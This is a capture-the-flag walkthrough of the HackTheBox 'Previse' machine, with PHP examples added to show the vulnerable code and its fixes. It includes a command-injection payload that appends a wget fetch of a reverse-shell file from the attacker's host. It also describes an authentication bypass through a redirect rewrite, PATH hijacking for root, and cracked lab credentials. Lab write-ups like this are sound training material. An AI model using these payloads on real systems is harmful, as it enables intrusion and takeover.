In this post, I would like to share a walkthrough of the Previse machine from HackTheBox.
This machine is rated Easy on HackTheBox.
What will you gain from the Previse machine?
For the user flag, you download a backup file from the website and get a shell with the help of Burp Suite.
For the root flag, you use PATH injection against a script that can be run with sudo to get a root reverse shell.
Information Gathering
Once the VPN connection is up (the configuration file is downloaded from HackTheBox), we can start gathering information on the machine by running nmap -sC -sV -p- <IP Address> -PN
Let’s try to open the website
We are redirected to a Previse File Storage login page, where I cannot find any useful information.
Let's run gobuster to enumerate interesting directories and PHP files.
The command can be something like:
gobuster dir -u http://<machine's ip> -w /usr/share/wordlists/dirb/common.txt -x php
The gobuster result gives us a few interesting files such as config.php.
Oh, wait! We also get 403 and 302 status codes on certain pages in the result.
For more information on those status codes, a quick search on the internet explains them: 403 Forbidden means access is denied, while 302 Found means the server redirects us elsewhere (here, to the login page).
Next, we open Burp Suite to inspect the web traffic.
Once Burp Suite is started, go to Proxy > Options and add a match/replace rule on response headers that replaces the 302 Found status line with 200 OK. The redirect only tells the browser to go to the login page; if the server still renders the protected page in the body of that 302 response, rewriting the status lets us see it.
Let's try to access accounts.php with Burp Suite's help.
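As an added illustration (not code from the Previse application or from the original post), the pattern below shows why a proxy rule that rewrites 302 Found to 200 OK can expose a protected page, and the one-line fix. The session check, page names and form content are assumptions standing in for the app's own.

```php
<?php
// Added example, not code from the Previse site: why an "execute after
// redirect" bug lets a 302->200 proxy rule expose a protected page.
// The session check, page names and form content are assumptions.
declare(strict_types=1);

session_start();

function is_logged_in(): bool
{
    return isset($_SESSION['user']);
}

function render_accounts_page(): string
{
    // Stands in for the real page: account creation should be admin-only.
    return "<h1>Accounts</h1>\n<form method=\"post\" action=\"accounts.php\">"
         . "<input name=\"username\"><input name=\"password\" type=\"password\">"
         . "<button>Create user</button></form>\n";
}

// VULNERABLE: header() queues the redirect but does not stop the script, so the
// protected HTML is still generated and sent as the body of the 302 response.
// A browser follows Location and never shows that body; a proxy that rewrites
// the status line to "200 OK" makes the browser render it instead.
function accounts_weak(): void
{
    if (!is_logged_in()) {
        header('Location: login.php');
        // no exit here -> execution falls through to the protected content
    }
    echo render_accounts_page();
}

// FIXED: terminate right after sending the redirect. Nothing below the check
// runs for an unauthenticated client, whatever the client does with the 302.
function accounts_fixed(): void
{
    if (!is_logged_in()) {
        header('Location: login.php', true, 302);
        exit;
    }
    echo render_accounts_page();
}

accounts_fixed();
```

A cheap server-side check for this class of bug: any 302 response whose body is more than a few hundred bytes deserves a look, because a correct redirect carries no page content.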
Gaining Privileged Access
The website has been loading for a while now, so let's look at Burp Suite.
On the Intercept tab, I notice a request that needs to be forwarded to the website.
After we forward the request, we get a page that lets us create a new account.
A new user is added to the system database, and we can now see the Dashboard.
From the screenshot above, we should roam within the website to look for useful details.
On the Files section, there's a file called SITEBACKUP.ZIP, which we can download to our machine.
Unzipping it gives us a bunch of PHP files, as shown in the screenshot above. We should read all of them, but one file in particular caught my eye: config.php.
It contains the MySQL connection configuration. Sadly, we cannot use the credentials right now, but we should save the username and password from config.php; they might be useful later.
The only problem we face right now is how to get a reverse shell on the machine.
While looking through the other files, we stumble on an interesting one, logs.php, where the POST parameter {$_POST['delim']} is used directly inside the file.
We also notice that there's a Log Data section under the Management Menu on the website.
The page should look something like the above, and we get a file after clicking the Submit button.
When I opened the file, I noticed a lot of lines in it. We might find a username that can log into the machine.
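The following is an added example, not the actual logs.php from the site backup: it shows the shape of the weakness described above (a POST parameter interpolated into a shell command) next to a hardened version that maps delim to a fixed allowlist. The export script path, the allowlist and the logging are assumptions.

```php
<?php
// Added example, not the Previse logs.php: an unvalidated delim parameter
// placed into a shell command, and a hardened replacement.
// The export script path and the allowlist below are assumptions.
declare(strict_types=1);

// Hypothetical log-export helper that the PHP page wraps.
const LOG_EXPORT_SCRIPT = '/opt/scripts/log_export.py'; // assumed path

// VULNERABLE: the POST value goes straight into the command line. Shell
// metacharacters in it (| ; && $( ) ...) are interpreted by /bin/sh, so the
// web server user ends up running attacker-chosen commands.
function export_logs_weak(string $delim): string
{
    $cmd = "/usr/bin/python " . LOG_EXPORT_SCRIPT . " {$delim}";
    return (string) shell_exec($cmd);
}

// Only these logical names are accepted; the client never supplies the
// delimiter character itself.
const DELIMITERS = [
    'comma' => ',',
    'space' => ' ',
    'tab'   => "\t",
];

// Returns the delimiter character for a known name, or null for anything else.
function validate_delim(?string $delim): ?string
{
    if ($delim === null || !array_key_exists($delim, DELIMITERS)) {
        return null;
    }
    return DELIMITERS[$delim];
}

// HARDENED: reject unknown values (and log them, since a rejected delim is a
// useful detection signal), then quote what reaches the shell anyway.
function export_logs_fixed(?string $delim): string
{
    $char = validate_delim($delim);
    if ($char === null) {
        error_log('logs.php: rejected delim value ' . bin2hex((string) $delim));
        http_response_code(400);
        return '';
    }
    $cmd = '/usr/bin/python ' . escapeshellarg(LOG_EXPORT_SCRIPT)
         . ' ' . escapeshellarg($delim);
    return (string) shell_exec($cmd);
}

// Quick self-check (run from the CLI) on constructed inputs; no server needed.
if (PHP_SAPI === 'cli') {
    assert(validate_delim('comma') === ',');
    assert(validate_delim('comma|true') === null);
    assert(validate_delim(null) === null);
    echo "delim validation checks passed\n";
}
```

The allowlist is the real fix; escapeshellarg is kept as defence in depth. On the detection side, the error_log line gives you a searchable record of every request that tried a delim value the page does not offer.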
Burp Suite Intercept
Let's analyze the flow with Burp Suite, where we notice a request body containing delim=comma.
We modify php-reverse-shell.php with our own IP and a chosen port.
A few things need to be running on our attacker machine: a Python HTTP server to serve the file and a netcat (nc) listener.
After those are started, we can get a reverse shell via Burp Suite.
In the Burp Suite request, we append a second command that retrieves our php-reverse-shell.php: delim=comma|wget http://<ip>:<port>/php-reverse-shell.php
Sadly, we get a 302 Found in the response, which shouldn't be happening.
How to solve this?
After a while, we retry by logging back in to the website.
Aside from that, I renamed php-reverse-shell.php to shell.php just in case.
Once everything is modified, we try to get a reverse shell again.
It is looking surprisingly good so far, so let's continue to the next step.
Boom! We got a reverse shell on our attacker machine.
MySQL Enumeration on the Previse Machine
Let's enumerate the database with the credentials we found earlier. Sadly, we get a MySQL syntax error from that command.
My bad! I ran the wrong command; running the correct one now, it works like a charm!
We can also read the usernames and password hashes stored in MySQL (my own user is there too).
To get the password, we need to crack the hash we found in MySQL.
For that purpose, we can use hashcat, which gives us the password.
As a result, we have the credentials shown below:
- username: m4lwhere
- password: ilovecody112235!
Maintaining Access on the Previse Machine
We can access the machine via SSH using the credentials we found.
We can read the user flag with the command cat user.txt
Escalating to Root on the Previse Machine
To escalate to root, we need to find something we can abuse, such as a SUID file or a script we are allowed to run with sudo.
Running sudo -l shows that we can run /opt/scripts/access_backup.sh.
Reading access_backup.sh, we see that it calls commands (gzip among them) by name rather than by absolute path, so whatever binary is found first in PATH gets executed.
I created a fake gzip executable containing a reverse shell command (a bash one-liner) under /dev/shm.
We need to make that gzip file executable.
We then export a PATH that puts /dev/shm first, so the script finds our gzip before the real one.
Next, we run the script with sudo, but we need to start our listener before executing it.
Voila! We get a shell back as root and can read the root flag with the command cat /root/root.txt